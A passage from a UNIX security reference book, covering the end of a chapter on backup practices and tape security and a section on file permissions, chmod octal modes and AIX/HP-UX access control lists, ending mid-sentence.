It seems that a government agency had hired a new night operator to do the backups of the <strong>UNIX</strong><br />

systems. The operator indicated that she had prior computer operations experience. Even if she hadn't,<br />

that was okay - little was needed in this job because the backup was largely the result of an automated<br />

script. All the operator had to do was log in at the terminal in the machine room located next to the tape<br />

cabinet, start up a command script, and follow the directions. The large disk array would then be backed<br />

up with the correct options.<br />

All went fine for several months, until one morning, the system administrator met the operator leaving.<br />

She was asked how the job was going. "Fine," she replied. Then the system administrator asked if she<br />

needed some extra tapes to go with the tapes she was using every night - he noticed that the disks were<br />

getting nearer to full capacity as they approached the end of the fiscal year. He was met by a blank stare<br />

and the chilling reply "What tapes?"<br />

Further investigation revealed that the operator didn't know she was responsible for selecting tapes from<br />

the cabinet and mounting them. When she started the command file (using <strong>UNIX</strong> dump), it would pause<br />

while mapping the sectors on disk that it needed to write to tape. She would wait a few minutes, see no<br />

message, and assume that the backup was proceeding. She would then retire to the lounge to read.<br />

Meanwhile, the tape program would, after some time, begin prompting the operator to mount a tape and<br />

press the return key. No tape was forthcoming, however, and the mandatory security software installed<br />

on the system logged out the terminal and cleared the screen after 60 minutes of no typing. The operator<br />

would come back some hours later and see no error messages of any kind.<br />

Murphy was kind: the system did not crash in the next few hours that it took the panicked system<br />

administrator to make a complete level zero dump of the system. Procedures were changed, and the<br />

operator was given more complete training.<br />

How do you know if the people doing your backups are doing them correctly?<br />

At least once a year, you should attempt to restore your entire system completely from backups to ensure<br />

that your entire backup system is working properly. Starting with a different, unconfigured computer, see<br />

if you can restore all of your tapes and get the new computer operational. Sometimes you will discover<br />

that some critical file is missing from your backup tapes. These practice trials are the best times to<br />

discover a problem and fix it.<br />

It's possible that your computer vendor may let you borrow or rent a computer of the appropriate<br />

configuration to let you perform this test. The whole process should take only a few hours, but it will do<br />

wonders for your peace of mind and will verify that your backup procedure is working correctly (or<br />

illustrate any problems, if it isn't). If you have business continuation insurance, you might even get a<br />

break on your premiums by doing this on a regular basis!<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch07_01.htm (8 of 12) [2002-04-12 10:44:08]


[Chapter 7] Backups<br />

A related exercise that can prove valuable is to pick a file at random, once a week or once a month, and<br />

try to restore it. Not only will this reveal if the backups are comprehensive, but the exercise of doing the<br />

restoration may also provide some insight.<br />

NOTE: We have heard many stories about how the tape drive used to make the backup<br />

tapes had a speed or alignment problem. Such a problem results in the tapes being readable<br />

by the drive that made them, but unreadable on every other tape drive in the world! Be sure<br />

that you load your tapes on other drives when you check them.<br />

7.1.5 How Long Should You Keep a Backup?<br />

It may take a week or a month to realize that a file has been deleted. Therefore, you should keep some<br />

backup tapes for a week, some for a month, and some for several months.<br />

Many organizations make yearly backups that they archive indefinitely. After all, tape or CD-ROM is<br />

cheap, and rm is forever. Keeping a yearly or a biannual backup "forever" is a small investment in the<br />

event that it should ever be needed again.<br />

You may wish to keep on your system an index or listing of the names of files on your backup tapes.<br />

This way, if you ever need to restore a file, you can find the right tape to use by scanning the index,<br />

rather than reading in every single tape. Having a printed copy of these indexes is also a good idea,<br />

especially if you keep the online index on a system that may need to be restored!<br />

NOTE: If you keep your backups for a long period of time, you should be sure to migrate<br />

the data on your backups each time you purchase a new backup system. Otherwise, you<br />

might find yourself stuck with a lot of tapes that can't be read by anyone, anywhere. This<br />

happened in the late 1980s to the MIT Artificial Intelligence Laboratory, which had a<br />

collection of research reports and projects from the 1970s on seven-track tape. One day, the<br />

lab started a project to put all of the old work online once more. The only problem was that<br />

there didn't appear to be a working seven-track tape drive anywhere in the country that the<br />

lab could use to restore the data.<br />

7.1.6 <strong>Sec</strong>urity for Backups<br />

Backups pose a double problem for computer security. On the one hand, your backup tape is your safety<br />

net: ideally, it should be kept far away from your computer system so that a local disaster cannot ruin<br />

both. But on the other hand, the backup contains a complete copy of every file on your system, so the<br />

backup itself must be carefully protected.<br />

7.1.6.1 Physical security for backups<br />

If you use tape drives to make backups, be sure to take the tape out of the drive! One company in San<br />

Francisco that made backups every day never bothered removing the cartridge tape from their drive:<br />

when their computer was stolen over a long weekend by professional thieves who went through a false<br />

ceiling in their office building, they lost everything. "The lesson is that the removable storage media is<br />

much safer when you remove it from the drive," said an employee after the incident.<br />

Do not store your backup tapes in the same room as your computer system! Any disaster that might<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch07_01.htm (9 of 12) [2002-04-12 10:44:08]


[Chapter 7] Backups<br />

damage or destroy your computers is likely to damage or destroy anything in the immediate vicinity of<br />

those computers as well. This rule applies to fire, flood, explosion, and building collapse.<br />

You may wish to consider investment in a fireproof safe to protect your backup tapes. However, the safe<br />

should be placed off site, rather than right next to your computer system. While fireproof safes do protect<br />

against fire and theft, they don't protect your data against explosion, many kinds of water damage, and<br />

building collapse.<br />

NOTE: Be certain that any safe you use for storing backups is actually designed for storing<br />

your form of media. One of the fireproof lockboxes from the neighborhood discount store<br />

might not be magnetically safe for your tapes. It might be heat-resistant enough for storing<br />

paper, but not for storing magnetic tape, which cannot withstand the same high<br />

temperatures. Also, some of the generic fire-resistant boxes for paper are designed with a<br />

liquid in the walls that evaporates or foams when exposed to heat, to help protect paper<br />

inside. Unfortunately, these chemicals can damage the plastic in magnetic tape or<br />

CD-ROMs.<br />

7.1.6.2 Write-protect your backups<br />

After you have removed a backup tape from a drive, do yourself a favor and flip the write-protect switch.<br />

A write-protected tape cannot be accidentally erased.<br />

If you are using the tape for incremental backups, you can flip the write-protect switch when you remove<br />

the tape, and then flip it again when you reinsert the tape later. If you forget to unprotect the tape, your<br />

software will probably give you an error and let you try again. On the other hand, having the tape<br />

write-protected will save your data if you accidentally put the wrong tape in the tape drive, or run a<br />

program on the wrong tape.<br />

7.1.6.3 Data security for backups<br />

File protections and passwords protect the information stored on your computer's hard disk, but anybody<br />

who has your backup tapes can restore your files (and read the information contained in them) on another<br />

computer. For this reason, keep your backup tapes under lock and key.<br />

Several years ago, an employee at a computer magazine pocketed a 4mm cartridge backup tape that was<br />

on the desk of the system manager. When the employee got the tape home, he discovered that it<br />

contained hundreds of megabytes of personal files, articles in progress, customer and advertising lists,<br />

contracts, and detailed business plans for a new venture that the magazine's parent company was<br />

planning. The tape also included tens of thousands of dollars worth of computer application programs,<br />

many of which were branded with the magazine's name and license numbers. Quite a find for an insider<br />

who is setting up a competing publication.<br />

When you transfer your backup tapes from your computer to the backup location, protect the tapes at<br />

least as well as you normally protect the computers themselves. Letting a messenger carry the tapes from<br />

building to building may not be appropriate if the material on the tapes is sensitive. Getting information<br />

from a tape by bribing an underpaid courier, or by knocking him unconscious and stealing it, is usually<br />

easier and cheaper than breaching a firewall, cracking some passwords, and avoiding detection online.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch07_01.htm (10 of 12) [2002-04-12 10:44:08]


[Chapter 7] Backups<br />

Another Tale of Backup Woe<br />

One apocryphal story we saw on the net several years ago concerned a system administrator who tried to<br />

do the right thing. Every week, he'd make a full backup of his system. He would test the backups to be<br />

certain the tapes were readable. Then he would throw them into the passenger seat of his car and he'd<br />

drive home, where he would store the tapes in a fireproof safe.<br />

All proceeded without incident for many months until there was a major disaster of some sort that<br />

destroyed the computer room. Our would-be hero felt quite relieved that he had these valuable backups<br />

in a safe place. So, after an alternate site was identified, he drove home and retrieved some of the tapes.<br />

Unfortunately, the tapes contained no usable data. All the data was lost.<br />

The problem? It seems that these events occurred in the far north, during the winter. The administrator's<br />

car had heater wires in the car seats, and the current passing through the wires degaussed the data on the<br />

tapes that he stored on the passenger seat during the long ride home.<br />

Is it true? Possibly. But even if not, the lessons are sound ones: test your backup tapes after subjecting<br />

them to whatever treatment you would expect for a tape you would need to use, and exercise great care in<br />

how you store and transport the tapes<br />

The use of encryption can dramatically improve the security for backup tapes. However, if you do choose<br />

to encrypt your backup tapes, be sure that the encryption key is known by more than one person. You<br />

may wish to escrow your key (see the sidebar entitled "A Note About Key Escrow" in Chapter 6,<br />

Cryptography). Otherwise, the backups may be worthless if the only person with the key forgets it,<br />

becomes incapacitated, or decides to hold your data for ransom.<br />

Here are some ideas for storing a backup tape's encryption key:<br />

●<br />

●<br />

●<br />

●<br />

Always use the same key. Physical security of your backup tape should be your first line of<br />

defense.<br />

Store copies of the key on pieces of paper in envelopes. Give the envelopes to each member of the<br />

organization's board of directors, or chief officers.<br />

If your organization uses an encryption system such as PGP that allows a message to be encrypted<br />

for multiple recipients, encrypt and distribute the backup encryption key so that it can be decrypted<br />

by anyone on the board.<br />

Alternatively, you might consider a secret-sharing system, so that the key can be decrypted by any<br />

two or three board members working together, but not by any board member on his own.<br />

7.1.7 Legal Issues<br />

Finally, some firms should be careful about backing up too much information, or holding it for too long.<br />

Recently, backup tapes have become targets in lawsuits and criminal investigations. Backup tapes can be<br />

obtained by subpoena or during discovery in lawsuits. If your organization has a policy regarding the<br />

destruction of old paper files, you should extend this policy to backup tapes as well.<br />

You may wish to segregate potentially sensitive data so that it is stored on separate backup tapes. For<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch07_01.htm (11 of 12) [2002-04-12 10:44:08]


[Chapter 7] Backups<br />

example, you can store applications on one tape, pending cases on another tape, and library files and<br />

archives on a third.<br />

Back up your data, but back up with caution.<br />

III. System <strong>Sec</strong>urity 7.2 Sample Backup Strategies<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch07_01.htm (12 of 12) [2002-04-12 10:44:08]


[Chapter 5] 5.2 Using File Permissions<br />

Chapter 5<br />

The <strong>UNIX</strong> Filesystem<br />

5.2 Using File Permissions<br />

Because file permissions determine who can read and modify the information stored in your files, they are your primary method<br />

for protecting the data that you store on your <strong>UNIX</strong> system.<br />

Consider the directory listing presented earlier in this chapter:<br />

% ls -lF<br />

total 161<br />

-rw-r--r-- 1 sian user 505 Feb 9 13:19 instructions<br />

-rw-r--r-- 1 sian user 3159 Feb 9 13:14 invoice<br />

-rw-r--r-- 1 sian user 6318 Feb 9 13:14 letter<br />

-rw------- 1 sian user 15897 Feb 9 13:20 more-stuff<br />

-rw-r----- 1 sian biochem 4320 Feb 9 13:20 notes<br />

-rwxr-xr-x 1 sian user 122880 Feb 9 13:26 stats*<br />

-------r-x 1 sian user 989987 Mar 6 08:13 weird-file<br />

%<br />

In this example, any user on the system can read the files instructions, invoice, letter, or stats because they all have the letter r in<br />

the "other" column of the permissions field. The file notes can be read only by user sian or by users who are in the biochem<br />

group. And only sian can read the information in the file more-stuff.<br />

A more interesting set of permissions is present on weird-file. User sian owns the file but cannot access it. Members of group<br />

user also are not allowed access. However, any user except sian who is also not in the group user can read and execute the file.<br />

Some variant of these permissions are useful in some cases where you want to make a file readable or executable by others, but<br />

you don't want to accidentally overwrite or execute it yourself. If you are the owner of the file and the permissions deny you<br />

access, it does not matter if you are in the group, or if other bits are set to allow the access.<br />

Of course, the superuser can read any file on the system, and anybody who knows Sian's password can log in as sian and read<br />

her files (including weird-file, if the permissions are changed first).<br />

5.2.1 chmod: Changing a File's Permissions<br />

You can change a file's permissions with the chmod command or the chmod() system call. You can change a file's permissions<br />

only if you are the file's owner. The one exception to this rule is the superuser: if you are logged in as superuser, you can change<br />

the permissions of any file.[12]<br />

[12] Any file that is not mounted using NFS, that is. See Chapter 20 for details.<br />

In its simplest form, the chmod command lets you specify which of a file's permissions you wish to change. This usage is called<br />

symbolic mode. The symbolic form of the chmod command[13] has the form:<br />

[13] The <strong>UNIX</strong> kernel actually supports two system calls for changing a file's mode: chmod(), which changes the<br />

mode of a file, and fchmod(), which changes the mode of a file associated with an open file descriptor.<br />

chmod [-Rfh] [agou][+-=][rwxXstugol] filelist<br />

This command changes the permissions of filelist, which can be either a single file or a group of files. The letters agou specify<br />

whose privileges are being modified. You may provide none, one, or more, as shown in Table 5.5.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch05_02.htm (1 of 9) [2002-04-12 10:44:09]


[Chapter 5] 5.2 Using File Permissions<br />

Table 5.5: Whose Privileges Are Being<br />

Modified?<br />

Letter Meaning<br />

a Modifies privileges for all users<br />

g Modifies group privileges<br />

o Modifies others' privileges<br />

u Modifies the owner's privileges<br />

The symbols specify what is supposed to be done with the privilege. You must type only one symbol, as shown in Table 5.6.<br />

Table 5.6: What to Do with Privilege<br />

Symbol Meaning<br />

+ Adds to the current privilege<br />

- Removes from the current privilege<br />

= Replaces the current privilege<br />

The last letters specify which privilege is to be added, as shown in Table 5.7.<br />

Table 5.7: What Privileges Are Being Changed?<br />

Letter Meaning<br />

Options for all versions of <strong>UNIX</strong><br />

r Read access<br />

w Write access<br />

x Execute access<br />

s SUID or SGID<br />

t Sticky bit[14]<br />

Options for BSD-derived versions of <strong>UNIX</strong> only:<br />

X Sets execute only if the file is a directory or already has some other execute bit set.<br />

u Takes permissions from the user permissions.<br />

g Takes permissions from the group permissions.<br />

o Takes permissions from other permissions.<br />

Options for System V-derived versions of <strong>UNIX</strong> only:<br />

l Enables mandatory locking on file.<br />

[14] On most systems, only the superuser can set the sticky bit on a non-directory filesystem entry.<br />

If the -R option is specified for versions that support it, the chmod command runs recursively. If you specify a directory in<br />

filelist, that directory has its permission changed, as do all of the files contained in that directory. If the directory contains any<br />

subdirectories, the process is repeated.<br />

If the -f option is specified for versions that support it, chmod does not report any errors encountered. This processing is<br />

sometimes useful in shell scripts if you don't know whether the filelist exists or not and if you don't want to generate an error<br />

message.<br />

The -h option is specified in some systems to change how chmod works with symbolic links. If the -h option is specified and one<br />

of the arguments is a symbolic link, the permissions of the file or directory pointed to by the link are not changed.<br />

The symbolic form of the chmod command is useful if you only want to add or remove a specific privilege from a file. For<br />

example, if Sian wanted to give everybody in her group write permission to the file notes, she could issue the command:<br />

% ls -l notes<br />

-rw-r--r-- 1 sian biochem 4320 Feb 9 13:20 notes %<br />

chmod g+w notes<br />

% ls -l notes<br />

-rw-rw-r-- 1 sian biochem 4320 Feb 9 13:20 notes %<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch05_02.htm (2 of 9) [2002-04-12 10:44:09]


To change this file further so people who aren't in her group can't read it, she could use the command:<br />

% chmod o-r notes<br />

% ls -l notes<br />

-rw-rw---- 1 sian biochem 4320 Feb 9 13:20 notes<br />

%<br />

To change the permissions of the invoice file so nobody else on the system can read or write it, Sian could use the command:<br />

% chmod go= invoice<br />

% ls -l invoice<br />

-rw------- 1 sian user 4320 Feb 9 13:20 invoice<br />

% date<br />

Sun Feb 10 00:32:55 EST 1991<br />

%<br />

Notice that changing a file's permissions does not change its modification time (although it will alter the inode's ctime).<br />

5.2.2 Changing a File's Permissions<br />

You can also use the chmod command to set a file's permissions, without regard to the settings that existed before the command<br />

was executed. This format is called the absolute form of the chmod command.<br />

The absolute form of chmod has the syntax:<br />

% chmod [-Rfh] mode filelist<br />

where options have the following meanings:<br />

-R<br />

-f<br />

-h<br />

[Chapter 5] 5.2 Using File Permissions<br />

As described earlier<br />

As described earlier<br />

As described earlier<br />

mode<br />

filelist<br />

The mode to which you wish to set the file, expressed as an octal[15] value<br />

[15] Octal means "base 8." Normally, we use base 10, which uses the digits 0, 1, 2, 3, 4, 5, 6, 7, 8, and 9. The<br />

octal system uses the digitals 0, 1, 2, 3, 4, 5, 6, and 7. If you are confused, don't be: for most purposes, you<br />

can pretend that the numbers are in decimal notation and never know the difference.<br />

The list of the files whose modes you wish to set<br />

To use this form of the chmod command, you must calculate the octal value of the file permissions that you want. The next<br />

section describes how to do this.<br />

5.2.3 Calculating Octal File Permissions<br />

chmod allows you to specify a file's permissions with a four-digit octal number. You calculate the number by adding[16] the<br />

permissions. Use Table 5.8 to determine the octal number that corresponds to each file permission.<br />

[16] Technically, we are ORing the values together, but as there is no carry, it's the same as adding.<br />

Table 5.8: Octal Numbers and Permissions<br />

Octal Number Permission<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch05_02.htm (3 of 9) [2002-04-12 10:44:09]


[Chapter 5] 5.2 Using File Permissions<br />

4000 Set user ID on execution (SUID)<br />

2000 Set group ID on execution (SGID)<br />

1000 "Sticky bit"<br />

0400 Read by owner<br />

0200 Write by owner<br />

0100 Execute by owner<br />

0040 Read by group<br />

0020 Write by group<br />

0010 Execute by group<br />

0004 Read by other<br />

0002 Write by other<br />

0001 Execute by other<br />

Thus, a file with the permissions "-rwxr-x---" has a mode of 0750, calculated as follows:<br />

0400 Read by owner<br />

0200 Write by owner<br />

0100 Execute by owner<br />

0040 Read by group<br />

0010 Execute by group 0750 Result<br />

Table 5.9 contains some common file permissions and their uses.<br />

Table 5.9: Common File Permissions<br />

Octal Number File Permission<br />

0755 /bin/ls Anybody can copy or run the program; the file's owner can modify it.<br />

0711 $HOME Locks a user's home directory so that no other users on the system can<br />

display its contents, but allows other users to access files or subdirectories<br />

contained within the directory if they know the names of the files or<br />

directories.<br />

0700 $HOME Locks a user's home directory so that no other users on the system can<br />

access its contents, or the contents of any subdirectory.<br />

0600 /usr/mail/$USER and other mailboxes The user can read or write the contents of the mailbox, but no other users<br />

(except the superuser) may access it.<br />

0644 any file The file's owner can read or modify the file; everybody else can only read<br />

it.<br />

0664 groupfile The file's owner or anybody in the group can modify the file; everybody<br />

else can only read it.<br />

0666 writable Anybody can read or modify the file.<br />

0444 readable Anybody can read the file; only the superuser can modify it without<br />

changing the permissions.<br />

5.2.4 Using Octal File Permissions<br />

After you have calculated the octal file permission that you want, you can use the chmod command to set the permissions of files<br />

you own.<br />

For example, to make all of the C language source files in a directory writable by the owner and readable by everybody else,<br />

type the command:<br />

% chmod 644 *.c<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch05_02.htm (4 of 9) [2002-04-12 10:44:09]


[Chapter 5] 5.2 Using File Permissions<br />

% ls -l *.c<br />

-rw-r--r-- 1 kevin okisrc 28092 Aug 9 9:52 cdrom.c<br />

-rw-r--r-- 1 kevin okisrc 5496 Aug 9 9:52 cfs_subr.c<br />

-rw-r--r-- 1 kevin okisrc 5752 Aug 9 9:52 cfs_vfsops.c<br />

-rw-r--r-- 1 kevin okisrc 11998 Aug 9 9:53 cfs_vnodeops.c<br />

-rw-r--r-- 1 kevin okisrc 3031 Aug 9 9:53 load_unld.c<br />

-rw-r--r-- 1 kevin okisrc 1928 Aug 9 9:54 Unix_rw.c<br />

-rw-r--r-- 1 kevin okisrc 153 Aug 9 9:54 vers.c<br />

%<br />

To change the permissions of a file so it can be read or modified by anybody in your group, but can't be read or written by<br />

anybody else in the system, type the command:<br />

% chmod 660 memberlist<br />

% ls -l memberlist<br />

-rw-rw---- 1 kevin okisrc 153 Aug 10 8:32 memberlist<br />

%<br />

5.2.5 Access Control Lists[17]<br />

[17] This section is largely based on Æleen Frisch's Essential System Administration, <strong>Sec</strong>ond Edition (<strong>O'Reilly</strong> &<br />

Associates, 1995), Chapter 6, and is used here with permission.<br />

Some versions of <strong>UNIX</strong> support Access Control Lists, or ACLS. These are normally provided as an extension to standard <strong>UNIX</strong><br />

file permission modes. With ACLS, you can specify additional access rights to each file and directory for many individual users<br />

rather than lumping them all into the category "other." You can also set different permissions for members of different groups.<br />

We think they are a wonderful feature, and something we will see more of in future years. Unfortunately, every vendor has<br />

implemented them differently, and this makes describing them somewhat complex.<br />

ACLS offer a further refinement to the standard <strong>UNIX</strong> file permissions capabilities. ACLS enable you to specify file access for<br />

completely arbitrary subsets of users and/or groups. Both AIX and HP-UX provide access control lists. Solaris and Linux are<br />

supposed to have them in future releases. Also, the Open Software Foundation's Distributed Computing Environment has a form<br />

of ACLS.<br />

For many purposes, ACLS are superior to the <strong>UNIX</strong> group mechanism for small collaborative projects. If Hana wants to give<br />

Miria - and only Miria - access to a particular file, Hana can modify the file's ACL to give Miria access. Without ACLS, Hana<br />

would have to go to the system administrator, have a new group created that contains both Hana and Miria (and only Hana and<br />

Miria) as group members, and then change the group of the file to the newly created group.<br />

NOTE: Because ACLS are not standard across <strong>UNIX</strong> versions, you should not expect them to work in a network<br />

filesystem environment. In particular, Sun plans to support ACLS through the use of private extensions to the NFS3<br />

filesystem, rather than building ACLS into the specification. Therefore, be sure that anything you export via NFS is<br />

adequately protected by the default <strong>UNIX</strong> file permissions and ownership settings.<br />

5.2.5.1 AIX Access Control Lists<br />

An AIX ACL contains these fields (the text in italics to the right describes the line contents):<br />

attributes: Special modes like SUID.<br />

base permissions Normal <strong>UNIX</strong> file modes:<br />

owner(chavez): rw- User access.<br />

group(chem): rw- Group access.<br />

others: r-- Other access.<br />

extended permissions More specific permissions entries:<br />

enabled Whether they're used or not.<br />

specify r-- u:harvey Permissions for user harvey.<br />

deny -w- g:organic Permissions for group organic.<br />

permit rw- u:hill, g:bio Permissions for user hill when in group<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch05_02.htm (5 of 9) [2002-04-12 10:44:09]


[Chapter 5] 5.2 Using File Permissions<br />

bio.<br />

The first line specifies any special attributes on the file (or directory). The possible attribute keywords are SETUID, SETGID,<br />

and SVTX (sticky bit is set). Multiple attributes are all placed on one line, separated by commas.<br />

The next section of the ACL lists the base permissions for the file or directory. These correspond exactly to the <strong>UNIX</strong> file<br />

modes. Thus, for the file we"re looking at, the owner (who is chavez) has read and write access, members of the group chem<br />

(which is the group owner of the file) also have read and write access, and all others have read access.<br />

The final section specifies extended permissions for the file: access information specified by user and group name. The first line<br />

in this section is either the word enabled or disabled, indicating whether the extended permissions that follow are actually used<br />

to determine file access or not. In our example, extended permissions are in use.<br />

The rest of the lines in the ACL are access control entries (ACES), which have the following format:<br />

operation access-types user-and-group-info<br />

where the operation is one of the keywords permit, deny, or specify, which correspond to chmod's +, -, and = operators,<br />

respectively. permit adds the specified permissions to the ones the user already has, based on the base permissions; deny takes<br />

away the specified access; and specify sets the access for the user to the listed value. The access-types are the same as those for<br />

normal <strong>UNIX</strong> file modes. The user-and-group-info consists of a user name (preceded by u:) or one or more group names (each<br />

preceded by g:) or both. Multiple items are separated by commas.<br />

Let"s look again at the ACES in our sample ACL:<br />

specify r-- u:harvey<br />

deny r-- g:organic<br />

permit rw- u:hill, g:bio<br />

The first line grants read-only access to user harvey on this file. The second line removes read access for the organic group from<br />

whatever permissions a user in that group already has. The final line adds read and write access to user hill while group bio is<br />

part of the current group set. By default, the current group set is all of the groups to which the user belongs.<br />

ACLS that specify a username and group are useful mostly for accounting purposes; the ACL shown earlier ensures that user hill<br />

has group bio active when working with this file. They are also useful if you add a user to a group on a temporary basis, ensuring<br />

that the added file access goes away if the user is later removed from the group. In the previous example, user hill would no<br />

longer have access to the file if she were removed from the bio group (unless, of course, the file's base permissions grant it to<br />

her).<br />

If more than one item is included in the user-and-group-info, then all of the items must be true for the entry to be applied to a<br />

process (AND logic). For example, the first ACE below is applied only to users who "have both bio and chem in their group<br />

sets" (which is often equivalent to "are members of both the chem and bio groups"):<br />

permit rw- g:chem, g:bio<br />

permit rw- u:hill, g:chem, g:bio<br />

The second ACE applies to user hill only when both groups are in the current group set. If you wanted to grant write access to<br />

anyone who was a member of either group chem or group bio, you would specify two separate entries:<br />

permit rw- g:chem<br />

permit rw- g:bio<br />

At this point, you might wonder what happens when more than one entry applies. When a process requests access to a file with<br />

extended permissions, the permitted accesses from the base permissions and all applicable ACES - all ACES which match the<br />

user and group identity of the process - are combined via a union operation. The denied accesses from the base permissions and<br />

all applicable ACES are also combined. If the requested access is permitted and it is not denied, then it is granted. Thus,<br />

contradictions among ACES are resolved in the most conservative way: access is denied unless it is both permitted and not<br />

denied.<br />

For example, consider the ACL below:<br />

attributes: base permissions<br />

owner(chavez): rwgroup(chem):<br />

r--<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch05_02.htm (6 of 9) [2002-04-12 10:44:09]


[Chapter 5] 5.2 Using File Permissions<br />

others: --extended<br />

permissions<br />

enabled<br />

specify r-- u:stein<br />

permit rw- g:organic, g:bio<br />

deny rwx g:physics<br />

Now suppose that the user stein, who is a member of both the organic and bio groups (and not a member of the chem group),<br />

wants write access to this file. The base permissions clearly grant stein no access at all to the file. The ACES in lines one and<br />

two of the extended permissions apply to stein. These ACES grant him read access (lines one and two) and write access (line<br />

two). They also deny him write and execute access (implicit in line one). Thus, stein will not be given write access because while<br />

the combined ACES do grant it to him, they also deny write access, and so the request will fail.<br />

NOTE: The base permissions on a file with an extended access control list may be changed with chmod's symbolic<br />

mode, and any changes made in this way will be reflected in the base permissions section of the ACL. However,<br />

chmod's numeric mode must not be used for files with extended permissions, because using it automatically<br />

disables them.<br />

ACLS may be applied and modified with the acledit command. acledit retrieves the current ACL for the file specified as its<br />

argument and opens it for editing, using the text editor specified by the EDITOR environment variable. The use of this variable<br />

under AIX is different from its use in other <strong>UNIX</strong> systems.[18] For one thing, no default exists (most <strong>UNIX</strong> implementations<br />

use vi when EDITOR is unset). For another, AIX requires that the full pathname to the editor be supplied, rather than only the<br />

filename.[19]<br />

[18] As are many things in AIX.<br />

[19] E.g., /bin/vi, not vi.<br />

Once in the editor, make any changes to the ACL that you wish. If you are adding extended permission ACES, be sure to change<br />

disabled to enabled in the first line of that section. When you are finished, exit from the editor normally. AIX will then print the<br />

message:<br />

Should the modified ACL be applied? (y)<br />

If you wish to discard your changes to the ACL, enter "n"; otherwise, you should enter a carriage return. AIX will then check the<br />

new ACL, and if it has no errors, apply it to the file. If there are errors in the ACL (misspelled keywords or usernames are the<br />

most common), you will be placed back in the editor where you can correct the errors and try again. AIX will put error messages<br />

like the following example at the bottom of the file, describing the errors it found:<br />

* line number 9: unknown keyword: spceify<br />

* line number 10: unknown user: chavze<br />

You don't need to delete the error messages themselves from the ACL.<br />

However, this is the slow way of applying an ACL. The aclget and aclput commands offer alternative ways to display and apply<br />

ACLS to files.<br />

aclget takes a filename as its argument, and displays the corresponding ACL on standard output (or to the file specified in its -o<br />

option).<br />

The aclput command is used to read an ACL from a text file. By default, it takes its input from standard input, or from an input<br />

file specified with the -i option. Thus, to set the ACL for the file gold to the one stored in the file metal.acl, you could use this<br />

command:<br />

$ aclput -i metal.acl gold<br />

This form of aclput is useful if you use only a few different ACLS, all of which are saved as separate files to be applied as<br />

needed.<br />

To copy an ACL from one file to another, put aclget and aclput together in a pipe. For example, the command below copies the<br />

ACL from the file silver to the file emerald:<br />

$ aclget silver | aclput emerald<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch05_02.htm (7 of 9) [2002-04-12 10:44:09]


[Chapter 5] 5.2 Using File Permissions<br />

To copy an ACL from one file to a group of files, use xargs:<br />

$ ls *.dat *.old | xargs -i /bin/sh -c "aclget silver | aclput {}"<br />

These commands copy the ACL in silver to all the files ending in .dat and .old in the current directory.<br />

You can use the ls -le command to quickly determine whether a file has an extended permissions set or not:<br />

$ ls -le *_acl<br />

-rw-r-----+ 1 chavez chem 51 Mar 20 13:27 has_acl<br />

-rwxrws---- 2 chavez chem 512 Feb 08 17:58 no_acl<br />

The plus sign appended to the normal mode string indicates the presence of extended permissions; the minus sign is present<br />

otherwise.<br />

5.2.5.2 HP-UX access control lists<br />

The lsacl command can be used to view the access control list for a file. For a file having only normal <strong>UNIX</strong> file modes set, the<br />

output looks like this:<br />

(chavez.%,rw-)(%.chem,r--)(%.%,---) bronze<br />

This example shows the format an ACL takes under HP-UX. Each parenthesized item is known as an access control list entry,<br />

although we're going to call them "entries." The percent sign character ("%") is a wildcard within an entry, and the three entries<br />

in the previous listing specify the access for user chavez as a member of any group, for any user in group chem, and for all other<br />

users and groups, respectively.<br />

A file can have up to 16 access control list entries: three base entries corresponding to normal file modes and up to 13 optional<br />

entries. Here is the access control list for another file (generated this time by lsacl -l):<br />

silver:<br />

rwx chavez.%<br />

r-x %.chem<br />

r-x %.phys<br />

r-x hill.bio<br />

rwx harvey.%<br />

--- %.%<br />

This ACL grants every access to user chavez with any current group membership (she is the file owner). It grants read and<br />

execute access to members of the chem and phys groups; it grants read and execute access to user hill, if hill is a member of<br />

group bio; it grants user harvey read, write, and execute access regardless of his group membership; and it grants no access to<br />

any other user or group.<br />

Entries within an HP-UX access control list are examined in order of decreasing specificity: entries with a specific user and<br />

group are considered first; those with only a specific user follow; ones with only a specific group are next; and the other entries<br />

are last of all. Within a class, entries are examined in order. When determining whether or not to permit file access, the first<br />

applicable entry is used. Thus, user harvey will be given write access to the file silver even if he is a member of the chem or phys<br />

group.<br />

The chacl command is used to modify the access control list for a file. ACLS can be specified to chacl in two distinct forms: as a<br />

list of entries or via a chmod-like syntax. By default, chacl adds entries to the current ACL. For example, these two commands<br />

add to the file server's ACL read access for the bio group and read and execute access for user hill:<br />

$ chacl "(%.bio,r--) (hill.%,r-x)" silver<br />

$ chacl "%.bio = r, hill.% = rx" silver<br />

In either format, the access control list must be passed to chacl as a single argument. The second format also includes + and -<br />

operators as in chmod. For example, this command adds read access for group chem and user harvey, and removes write access<br />

for group chem, adding or modifying ACL entries as needed:<br />

$ chacl "%.chem -w+r, harvey.% +r" silver<br />

chacl's -r option can be used to replace the current ACL:<br />

$ chacl -r "@.% = 7, %.@ = rx, %.bio = r, %.% = " *.dat<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch05_02.htm (8 of 9) [2002-04-12 10:44:09]


[Chapter 5] 5.2 Using File Permissions<br />

The @ sign is a shorthand for the current user or group owner as appropriate, and also enables user-independent ACLS to be<br />

